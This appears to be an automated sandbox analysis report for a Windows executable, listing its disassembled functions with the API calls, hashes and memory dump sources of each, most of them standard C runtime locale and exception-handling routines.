Instruction ID: 8f5c717f571228ea28b6afe93381d8697d52a193d1ccae74da4541ace6ab4e78
Opcode Fuzzy Hash: 027178745c6ab33314638402d1015adab474f945bbec31f2166dfcf4f2cd9889
Instruction Fuzzy Hash: 73F07A3240065ABBCF125F92DC09DDE3F26FF597A4F058011FA19A5121DB32C972EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008D40AA Relevance: 3.0, APIs: 2, Instructions: 28
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 008D40B5
std::_Throw_Cpp_error.LIBCPMT ref: 008D40E3

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: Cpp_errorCurrentThreadThrow_std::_
String ID:
API String ID: 350343453-0
Opcode ID: 82d9f69051636ccbb5099e83b2cb07d2ebbc632bd15a202fa99ef73ad9e3d3c1
Instruction ID: 0c41a25d6d612cf4a4062faf1edaa47b7e79607947d4e116d250c2a9a932b92f
Opcode Fuzzy Hash: 82d9f69051636ccbb5099e83b2cb07d2ebbc632bd15a202fa99ef73ad9e3d3c1
Instruction Fuzzy Hash: A2E09239500A00DBD7701A59AC02B12B7E8FB80B11F14973FA696C6645E6B24C509662

Uniqueness

Uniqueness Score: -1.00%

Function 008EA2CF Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,008EA51E,008EA512,00000000), ref: 008EA301

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 7f72298d4ec0e575f76b6627bf14e7a13f2251d6944229d9fc887df5d1efc0de
Instruction ID: f4561466ad481cfaf0352a6d40b8ac832d2bb3808a41bae72051123bdad3331c
Opcode Fuzzy Hash: 7f72298d4ec0e575f76b6627bf14e7a13f2251d6944229d9fc887df5d1efc0de
Instruction Fuzzy Hash: DB517E7550828C9ADB218E29CC84AFA7BBCFB47B08F2401EDD099C7182C275AD45DB21

Uniqueness

Uniqueness Score: -1.00%

Function 008E5F7A Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b82c4b480f1d343e388080ee4d36367b03868182be50cc2036a38442354695e5
Instruction ID: 1c52712705399ce1501f33f2270726fa4fc0c725cc733e5c2280f922a7d965b5
Opcode Fuzzy Hash: b82c4b480f1d343e388080ee4d36367b03868182be50cc2036a38442354695e5
Instruction Fuzzy Hash: D1012833704A555F9B158E7EEC40E6A3396FBC63287244120FA15DB28ADF30D8418790

Uniqueness

Uniqueness Score: -1.00%

Function 008D1D1E Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 008D1D73

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: f213c69c2707e143e0661345345a741d7ad629bd427fcdb0963a2e4d0ffff95d
Instruction ID: 946685ea9ee0793cd809948de18300a084ef632966f48b0b46ee0ccf81d76e49
Opcode Fuzzy Hash: f213c69c2707e143e0661345345a741d7ad629bd427fcdb0963a2e4d0ffff95d
Instruction Fuzzy Hash: 4CF090B210830E7FDA209E55EC49D67BB6DFF52364F10061FF244D6251EA32A85487B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008EDAD1 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 008EDCB5

Strings

1#QNAN, xrefs: 008EDBE4
1#SNAN, xrefs: 008EDBDD
1#IND, xrefs: 008EDBD6
1#INF, xrefs: 008EDC07

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 536f830682125bb8abdd3c27f950aea60350d1a19fff7362ea60fd0504495f83
Instruction ID: 7fdd060a7a12feaf1a2dbf8d14367ff77fc0f4226a1ca561c85fc400b608b565
Opcode Fuzzy Hash: 536f830682125bb8abdd3c27f950aea60350d1a19fff7362ea60fd0504495f83
Instruction Fuzzy Hash: 4CD23771E082698FDB65CE29CC407EAB7B5FB86304F1445EAD44DE7240EB78AE858F41

Uniqueness

Uniqueness Score: -1.00%

Function 008ECF31 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,008ED24F,00000002,00000000,?,?,?,008ED24F,?,00000000), ref: 008ECFCA
GetLocaleInfoW.KERNEL32(?,20001004,008ED24F,00000002,00000000,?,?,?,008ED24F,?,00000000), ref: 008ECFF3
GetACP.KERNEL32(?,?,008ED24F,?,00000000), ref: 008ED008

Strings

ACP, xrefs: 008ECF4F
OCP, xrefs: 008ECF85

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6053b4938d51179ef54700a4fbff15d15b56c2ae8a0aaf3f6cb9b0aebf105f13
Instruction ID: 7999b7093fcb5bd68a5059b8f00b9eb8a47c0cf8fd0537084f702bbceee36d10
Opcode Fuzzy Hash: 6053b4938d51179ef54700a4fbff15d15b56c2ae8a0aaf3f6cb9b0aebf105f13
Instruction Fuzzy Hash: 59219032A00585AADB348F66C900BABB7A7FB56B64F568425E90AD7104FB72DD42C350

Uniqueness

Uniqueness Score: -1.00%

Function 008ED106 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008E3600: GetLastError.KERNEL32(?,?,008DDD04,008FD328,0000000C), ref: 008E3604
Part of subcall function 008E3600: SetLastError.KERNEL32(00000000), ref: 008E36A6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 008ED212
IsValidCodePage.KERNEL32(00000000), ref: 008ED25B
IsValidLocale.KERNEL32(?,00000001), ref: 008ED26A
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 008ED2B2
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 008ED2D1

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 2d6f64957baef07f13598084bc36f9cbc60a5518d8f89a53544e910e2012fbdd
Instruction ID: 34330a865208c0ceaa208f30673eb9d538ffac4b3f5127980d9e0089504f4598
Opcode Fuzzy Hash: 2d6f64957baef07f13598084bc36f9cbc60a5518d8f89a53544e910e2012fbdd
Instruction Fuzzy Hash: D8516072A00349ABDB20DFAADC45EBAB7B8FF5A700F144465FA10E7190EB70D944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008EC7A2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008E3600: GetLastError.KERNEL32(?,?,008DDD04,008FD328,0000000C), ref: 008E3604
Part of subcall function 008E3600: SetLastError.KERNEL32(00000000), ref: 008E36A6

GetACP.KERNEL32(?,?,?,?,?,?,008E1D22,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 008EC863
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,008E1D22,?,?,?,00000055,?,-00000050,?,?), ref: 008EC88E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 008EC9F1

Strings

utf8, xrefs: 008EC960

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: ff3973080cdb6d5d0aa57331f8fec5c807cc353576ab33acf85090e6abe2a31f
Instruction ID: 11bb3b432d1b2697eb4559016e1c0681c6d53701ca4e7623ef548adeb3d5bde6
Opcode Fuzzy Hash: ff3973080cdb6d5d0aa57331f8fec5c807cc353576ab33acf85090e6abe2a31f
Instruction Fuzzy Hash: E071F572E00295AADB24BB7BCC42FBA77A8FF4A704F14403AF515D7182FB70E9428651

Uniqueness

Uniqueness Score: -1.00%

Function 008E4C33 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008E4CC0

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c8b3115fbadac6014dafda632bdcae0fab0cd1c18024c0d8385e16eb91cb886f
Instruction ID: f16fccc464ba030cc7581e2768b464d9d1c3ff6b3be27042476bb20b17aa983a
Opcode Fuzzy Hash: c8b3115fbadac6014dafda632bdcae0fab0cd1c18024c0d8385e16eb91cb886f
Instruction Fuzzy Hash: AAB17A32E042CA9FDB158F29C881BFEBBA5FF56314F25516AE918EB241C2349D01C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 008D7093 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 008D709F
IsDebuggerPresent.KERNEL32 ref: 008D716B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008D7184
UnhandledExceptionFilter.KERNEL32(?), ref: 008D718E

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ac8d98682c2ffac2b1572b1ce071b62a0a3638abcb69961063ff2e523202e021
Instruction ID: 6f07dd8470a0a6077978f420a4d414cc26664f9fb78388525d6c838c47a5dbb2
Opcode Fuzzy Hash: ac8d98682c2ffac2b1572b1ce071b62a0a3638abcb69961063ff2e523202e021
Instruction Fuzzy Hash: 0531E575D05218DADB20DFA4D949BCDBBB8FF48300F1042AAE50DAB250EB719A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 008ECBB5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 008E3600: GetLastError.KERNEL32(?,?,008DDD04,008FD328,0000000C), ref: 008E3604
Part of subcall function 008E3600: SetLastError.KERNEL32(00000000), ref: 008E36A6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 008ECC09
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 008ECC53
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 008ECD19

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 69b993a2586a538ff868942c89b3bda8575d07c4ab13ae3709251099e7cfc270
Instruction ID: dba801340573dac3ff13ca03dc344e4255d23b06abe27a33674d27e60b578501
Opcode Fuzzy Hash: 69b993a2586a538ff868942c89b3bda8575d07c4ab13ae3709251099e7cfc270
Instruction Fuzzy Hash: B261A371E0014B9FDB249F2ACD82BBA7BA8FF06300F10417AE915C6185FB75D942CB54

Uniqueness

Uniqueness Score: -1.00%

Function 008DADD3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 008DAECB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 008DAED5
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 008DAEE2

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b7d17e2910fa5141df95c0183091b0fd2d295db8cdb6220f1f5acbb8444074eb
Instruction ID: 17a5430539eee8189d7517268105b6f707a79ecbb6cd5fd40d4b1f0164111dbb
Opcode Fuzzy Hash: b7d17e2910fa5141df95c0183091b0fd2d295db8cdb6220f1f5acbb8444074eb
Instruction Fuzzy Hash: 7B31C47490121C9BCB61DF68DC89B9DBBB8FF48310F6042EAE41CA6251EB709B85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0091E7BF Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 761COMMONLIBRARYCODE

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 0091E897

Part of subcall function 0091AFC0: __call_reportfault.LIBCMT ref: 0091AFCD

Strings

T, xrefs: 0091E968

Memory Dump Source

Source File: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: __call_reportfault__invoke_watson
String ID: T
API String ID: 3340580077-3187964512
Opcode ID: ead97eb45e45b6b9a9b289cf902855ac08d67e93d49c29dbfd04bf8f162c7824
Instruction ID: 8ee19a5b051ca9cf3d6a40406adc970bee22dffd9dd5cc61a848a1597cc9cd54
Opcode Fuzzy Hash: ead97eb45e45b6b9a9b289cf902855ac08d67e93d49c29dbfd04bf8f162c7824
Instruction Fuzzy Hash: 0F528E76E0065ECBDF24CFA8C8912EEB7B5FF54300F54856ADC06AB281E7749985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 008E0160 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc5fc3ef393b46102073ef610e3e9dbb82813f9c322e73eebb45c748b4ac2cad
Instruction ID: faef7d93c28f62c485eedfd07e516a2775b07e3e5068a1e8a5eb7102c2edc3a7
Opcode Fuzzy Hash: cc5fc3ef393b46102073ef610e3e9dbb82813f9c322e73eebb45c748b4ac2cad
Instruction Fuzzy Hash: A6F15D71E002599FDF14CFA9C8806AEB7B1FF89324F158669E919EB380D770AD418F94

Uniqueness

Uniqueness Score: -1.00%

Function 008E4213 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008E420E,?,?,00000008,?,?,008F2345,00000000), ref: 008E4440

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 4573a207b93246b4fd2a81a74175d41440aa039f75a291aa68e8904858206545
Instruction ID: d0a6c4998b00d894d460796495ad33ab58e90ba8bdad49b28eceed244f66b761
Opcode Fuzzy Hash: 4573a207b93246b4fd2a81a74175d41440aa039f75a291aa68e8904858206545
Instruction Fuzzy Hash: 7EB14B31210648DFD718CF29C48AB657BE0FF46368F299658E99DCF2A1C335E982CB44

Uniqueness

Uniqueness Score: -1.00%

Function 008D6B7C Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008D6B92

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: c1b8993689d156ed0b9effef2d8dcda1c7ea76a18c07ba203c5333145e4c7e55
Instruction ID: 8d18ad9b8ddf7cca3d42fa6bd54f4670af8a25af9c9be665951e14e3fc1e7f0f
Opcode Fuzzy Hash: c1b8993689d156ed0b9effef2d8dcda1c7ea76a18c07ba203c5333145e4c7e55
Instruction Fuzzy Hash: 5B51ADB1A156098FDB28CF65E8817AEBBF0FF84310F24812AC548EB361E775AD10CB54

Uniqueness

Uniqueness Score: -1.00%

Function 008E9C1F Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ba232f1af8935b4f4a279a0429d4a149cc1f99355adaf668105243e498a86fa
Instruction ID: 7b1a3d463f27c02c5a24ad95bfb648a3b3d21fddfaffe24df6898dabea650431
Opcode Fuzzy Hash: 4ba232f1af8935b4f4a279a0429d4a149cc1f99355adaf668105243e498a86fa
Instruction Fuzzy Hash: 8541C675804269AFDB20DF7ACC89AAABBB8FF46300F1442D9E45DD3201DA759E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 008DCF44 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 008DD0D2

Memory Dump Source

Source File: 00000000.00000002.1703998742.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.1703983231.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704019838.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704058367.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704074014.0000000000936000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c2a68578b0ef2005ee00bc1f3a5f9109a7a14bac3f1f5c45ce77dbdee46403ec
Instruction ID: bc7407759287118ed2c30c493a8d42d03f08f9558bbf194ccf9687fb04895cd2
Opcode Fuzzy Hash: c2a68578b0ef2005ee00bc1f3a5f9109a7a14bac3f1f5c45ce77dbdee46403ec
Instruction Fuzzy Hash: 85C19B70500B4A8FCB248F68C491ABEBBA2FB85314F14471BD896DB391CB71ED46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008ECE08 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

